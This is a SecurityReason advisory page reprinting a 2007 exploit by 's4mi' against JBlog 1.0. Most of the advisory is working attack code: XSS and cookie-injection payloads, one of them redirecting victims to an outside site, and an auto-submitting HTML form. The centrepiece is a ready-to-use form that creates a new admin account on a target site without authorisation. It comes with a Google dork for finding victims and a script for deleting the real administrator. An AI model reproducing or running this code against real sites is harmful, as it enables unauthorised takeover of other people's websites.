|
 |
| SecurityReason | ||
| WLB | ||
| Services | ||
| RSS | ||
| Corporate | ||
| Note | ||
If you have found a vulnerability, please send to our SecurityAlert Database : |
||
Home  SecurityAlert Database |
||||
SecurityAlert : 2919 CVE : CVE-2007-3974 CVE : CVE-2007-3973 SecurityRisk : Low  (About) Remote Exploit : Yes Local Exploit : No Exploit Given : Yes Credit : s4mi Published : 26.07.2007
Advisory Text : <!-- ######################################################################## ###### # Script...............: JBlog version: 1.0 # # Script Site..........: http://www.jmuller.net/jblog # # Vulnerability........: Creat Admin exploit, xss, Cookie Manipulation # # Access...............: Remote # # level................: Dangerous # # Author...............: s4mi # # Contact..............: S4mi[at]LinuxMail.org # # # ######################################################################## ###### cookies Manipulation + Cross Site Scripting : ======================================================================== = xss: ---- http://site.com/jblog/index.php?id=">[xss Here]&pcomm=com cookies Manipulation: -------------------- The POST variable 'search' in /jblog/recherche.php also The Cookie variable 'theme' is affected and can be set to : <meta http-equiv='Set-cookie' content='name=value'> also we can do this : <meta http-equiv='Set-cookie' content='theme=<body+onload=alert("owned_by_Hacker")>'> or : <meta http-equiv='Set-cookie' content='theme=<body+onload=document.location="http://Bad.site.com/">'> This is a small exemple of Inject Cookie Xploit (Cookie Manipulation) ------------------------------------------------------------------------ --- <html> <head> <title>Inject Cookie Xploit By S4mi</title> </head> <body> <script language="JavaScript"> function JBlogxpl() { document.xploit.action=document.xploit.victim.value; document.xploit.submit(); } </script> <form name="xploit" method="post" action=""> <input type="hidden" name="victim" value="http://victim/jblog/recherche.php"> <input type="hidden" name="search" value="<meta http-equiv='Set-cookie' content='theme=<body+onload=document.location="http://milw0rm.co m/">'>" /> <script>document.location="javascript: JBlogxpl()"</script> </form> </body> </html> ======================================================================== ==== Remote Privilege Escalation "Creat New Admin Xploit" By S4mi : ======================================================================== ==== --> <html> <title>JBlog 1.0 -- Remote Privilege Escalation (Creat admin sploit) -- By S4mi</title> <body> <script language="JavaScript"> function JBlogxpl() { if (document.xploit.victim.value=="") { alert("Please enter target!"); return false; } { xploit.action="http://"+document.xploit.victim.value+"admin/ajoutaut.php "; xploit.mot.value=document.xploit.mot.value; xploit.droit.value=document.xploit.droit.value; xploit.submit(); } } </script> <strong><p> ------------------------------------------------------------------------ -------------------<br> #JBlog 1.0 -- Remote Privilege Escalation Xploit (add user)<br> # Discovered By...............: S4mi <br> # Contact..........................: S4mi[at]LinuxMail.org<br> #<br> # Google Dork : "propulsé par JBlog" <br> ------------------------------------------------------------------------ --------------------</p> <form name="xploit" method="POST" onSubmit="JBlogxpl();"> Target -> Http:// <input type="text" name="victim" value="www.Site.com/Path/" size="44"> <p> Username.......-> <input type="text" name="mot" value="ZaZ" size="30"> (your password will be by default: <i>"admin"</i>)</p> <p> User type......-> <select name="droit"> <option value="3">Admin</option> <option value="2">Moderator</option> <option value="1">Editor</option> </select> </p> <p>Submit...........-> <input name="submit" type="submit" value=" Xploit it "> </p> </form> <br>-------------------------------------------------------------------- -------------------<br> #NB : Remember do not use a probably existing username (such as "admin"). <br> #If you want to Delete real admin account :D login into your New Created admin account & use this :<br> ------------------------------------------------------------------------ --------------------<p> <script language="JavaScript"> function AdminDelete() { if (document.xploit.victim.value=="") { alert("Please enter target!"); return false; } if(confirm('Are you Sure!! want really DELETE user ?')) document.location.href="http://"+document.xploit.victim.value+"admin/sup auteur.php?cat="+document.userdel.id.value; } </script> <form name="userdel" method="POST" onSubmit=""> ID...............> <input type="text" name="id" value="1" size="3"> </form> <a href="#" OnClick="AdminDelete()"/>Delete</a> <br>-------------------------------------------------------------------- ---------------------------<br> #Special Greetz to : Simo64, DrackaNz, Coder212, Iss4m, HarDose, r0_0t, ddx39, Black-Code, Nuck3r... & all who know Me! </body> </html>  Feedback : If you have additional information or notice any errors regarding this security advisory, please use contact form or email us at info()securityreason()com. |
||||
| Alert | ||
Multiple Vendors libc/gdtoa printf(3) Array Overrun
SecurityReason realised new advisory about vulnerabilities libc/gdtoa... |
||
| Apache |  |
|
» Apache Tomcat |
||
» Apache Tomcat User |
||
| PHP | |
|
» PHP |
||
- 2009-05-30| Copyright © SecurityReason.com. All Rights Reserved. |